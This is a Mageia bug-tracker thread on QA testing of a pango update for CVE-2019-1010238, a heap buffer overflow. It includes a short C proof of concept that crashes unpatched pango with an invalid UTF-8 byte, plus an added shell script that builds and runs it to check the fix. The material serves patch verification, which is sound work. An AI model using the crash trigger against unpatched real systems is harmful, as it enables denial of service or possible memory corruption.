Ubuntu and Debian have issued advisories on July 31 and August 11: https://usn.ubuntu.com/4081-1/ https://www.debian.org/security/2019/dsa-4496
Assigning to all packagers collectively, since there is no registered maintainer for this package.
Assignee: bugsquad => pkg-bugs
CC: (none) => marja11
Patched package uploaded for Mageia 7.

Advisory:
========================

Updated pango package fixes security vulnerability:

It was discovered that pango was subject to a heap-based buffer overflow vulnerability which could be used to get code execution (CVE-2019-1010238).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010238
https://usn.ubuntu.com/4081-1/
https://www.debian.org/security/2019/dsa-4496
========================

Updated packages in core/updates_testing:
========================
lib64pango1.0_0-1.43.0-3.1.mga7
lib64pango1.0-devel-1.43.0-3.1.mga7
lib64pango-gir1.0-1.43.0-3.1.mga7
pango-1.43.0-3.1.mga7
pango-tests-1.43.0-3.1.mga7
pango-doc-1.43.0-3.1.mga7.noarch.rpm

from pango-1.43.0-3.1.mga7.src.rpm
CC: (none) => mrambo
Assignee: pkg-bugs => qa-bugs
mga7, x86-64

Familiarization before updating.

Installed pango-tests then searched for test files. The executables reside in /usr/libexec/installed-tests/pango.

./<whatever> --help shows the options, which apply to all the executables.

$ ./<executable> -l
shows which test is run.

I would recommend
$ ./<executable> --verbose
e.g.
$ ./testcolor --verbose
GTest: random seed: R02Sf3c982ab8aea203daeb7754509818f16
GTest: run: /color/parse
GTest: result: OK

Updated the packages.

$ cd /usr/libexec/installed-tests/pango
$ ./markup-parse --verbose
GTest: random seed: R02Sdc459ea2857fcd9d88449ce7201a19e3
GTest: run: /markup/parse/fail-4.markup
(MSG: GLib-DEBUG: posix_spawn avoided (fd close requested) )
GTest: result: OK
GTest: run: /markup/parse/valid-5.markup
(MSG: GLib-DEBUG: posix_spawn avoided (fd close requested) )
GTest: result: OK
[...]

$ ./testboundaries --verbose
GTest: random seed: R02S823a12ab981c82b452a85b5407c07e64
GTest: run: /text/boundaries
sample file: ./boundaries.utf8
testboundaries passed
GTest: result: OK

$ ./test-pangocairo-threads --verbose
Assuming that one is OK.

$ ./testboundaries_ucd --verbose
GTest: random seed: R02Sc74c3ab81d2f2d3727142f17eece4a34
GTest: run: /text/break/grapheme
Testing ./GraphemeBreakTest.txt.
GTest: result: OK
[...]
All other breaktests were skipped because there were no other test text files.
Assuming that last one is OK.

Ran several other tests - all OK.

Assigning a 64-bit OK.
CC: (none) => tarazed25
Whiteboard: (none) => MGA7-64-OK
Rider to comment 3: Forgot to look for a PoC before the update.

CVE-2019-1010238
https://gitlab.gnome.org/GNOME/pango/issues/342

This snippet is supposed to crash before the update:

#include <stdio.h>    /* added: declares printf */
#include <string.h>   /* added: declares strlen */
#include <pango/pango.h>
#include <pango/pango-bidi-type.h>

int main()
{
    PangoDirection dir = PANGO_DIRECTION_LTR;
    char* inp = "\xf8";   /* a lone, invalid UTF-8 lead byte */
    /* g_utf8_strlen returns a glong, so %ld rather than %lu */
    printf("utf8 len %ld\n", g_utf8_strlen(inp, strlen(inp)));
    pango_log2vis_get_embedding_levels(inp, strlen(inp), &dir);
    return 0;
}

Could not figure out how to access all the include files. e.g.

$ gcc -lpango1 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/include/glib-2.0/include -I/usr/include/glib-2.0/glib -o pangotest pangotest.c
In file included from /usr/include/glib-2.0/glib/galloca.h:32,
                 from /usr/include/glib-2.0/glib.h:30,
                 from /usr/include/pango-1.0/pango/pango-coverage.h:25,
                 from /usr/include/pango-1.0/pango/pango-font.h:25,
                 from /usr/include/pango-1.0/pango/pango-attributes.h:25,
                 from /usr/include/pango-1.0/pango/pango.h:25,
                 from pangotest.c:1:
/usr/include/glib-2.0/glib/gtypes.h:32:10: fatal error: glibconfig.h: No such file or directory
 #include <glibconfig.h>
          ^~~~~~~~~~~~~~
compilation terminated.

$ locate glibconfig
/usr/lib64/glib-2.0/include/glibconfig.h

There must be a more concise way of defining all the include paths, some kind of macro perhaps?
Maybe install the -devel package and use pkg-config --cflags pango and pkg-config --libs pango to get the compiler flags.
In reply to comment 5: Thanks David. Yes I installed the devel package as part of the update. Not familiar with exact procedure for pkg-config. Is it something like `pkgconfig --cflags pango` in the compiler command? Or $(pkgconfig --cflags ....)? I'll experiment.
Tried the cli and the best course seems to be to copy and paste the result into the compiler command.
Yep, that worked fine. $ gcc -lpango-1.0 -lgobject-2.0 -lglib-2.0 -I/usr/include/pango-1.0 -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -I/usr/include/fribidi -I/usr/include/harfbuzz -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/libxml2 -I/usr/include/cairo -I/usr/include/pixman-1 -I/usr/include/libdrm -o pangotest pangotest.c $ ./pangotest utf8 len 0 So no crash after the update.
$ gcc $(pkg-config --cflags pango) $(pkg-config --libs pango) -o test pangotest.c also works.
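The build-and-run check from comments 4 to 9, collected into one script as an added example (not part of the bug report or of pango itself). It writes the PoC quoted in comment 4 to a temporary file, compiles it with the pkg-config flags from comment 9, runs it, and turns the exit status into a verdict. It assumes gcc, pkg-config and the pango -devel package are installed; the helper names (write_poc, build_poc, classify_exit) are this script's own.

```shell
#!/bin/sh
# Added example: build and run the CVE-2019-1010238 PoC with pkg-config flags.
# Assumes gcc, pkg-config and a pango .pc file (pango devel package) on the box.

write_poc() {
    # $1: path of the C file to create. Body is the PoC from the GNOME issue,
    # with the stdio/string headers it needs to compile without warnings.
    cat > "$1" <<'EOF'
#include <stdio.h>
#include <string.h>
#include <pango/pango.h>
#include <pango/pango-bidi-type.h>

int main(void)
{
    PangoDirection dir = PANGO_DIRECTION_LTR;
    const char *inp = "\xf8";   /* lone invalid UTF-8 lead byte */
    printf("utf8 len %ld\n", g_utf8_strlen(inp, strlen(inp)));
    pango_log2vis_get_embedding_levels(inp, strlen(inp), &dir);
    return 0;
}
EOF
}

build_poc() {
    # $1: source file, $2: output binary. Let pkg-config expand the include
    # and link flags instead of pasting its output into the command line.
    gcc $(pkg-config --cflags pango) -o "$2" "$1" $(pkg-config --libs pango)
}

classify_exit() {
    # $1: a shell exit status. 0 means the PoC ran to completion; a status
    # above 128 means the process was killed by signal (status - 128), e.g.
    # 139 = SIGSEGV, 134 = SIGABRT from glibc's heap consistency checks.
    status="$1"
    if [ "$status" -eq 0 ]; then
        echo "no-crash"
    elif [ "$status" -gt 128 ]; then
        echo "crash-signal-$((status - 128))"
    else
        echo "error-$status"
    fi
}

main() {
    tmp=$(mktemp -d)
    write_poc "$tmp/pangotest.c"
    build_poc "$tmp/pangotest.c" "$tmp/pangotest" || { echo "build failed"; exit 2; }
    "$tmp/pangotest"
    verdict=$(classify_exit $?)
    echo "verdict: $verdict"
    rm -rf "$tmp"
}

# Only run when invoked as `sh check-pango.sh run`, so the helpers can be sourced.
[ "${1:-}" = "run" ] && main
```

A "no-crash" verdict is weaker evidence than a crash: a heap overflow of a few bytes inside libpango can leave the process alive, as the "utf8 len 0" run in comment 8 shows nothing either way. Running the binary under valgrind reports the invalid write regardless of whether it happens to hit something fatal, and it works on the uninstrumented system libpango, whereas -fsanitize=address on the PoC alone only instruments the PoC's own code.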
Keywords: (none) => advisory, validated_update
CC: (none) => tmb, sysadmin-bugs
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2019-0235.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED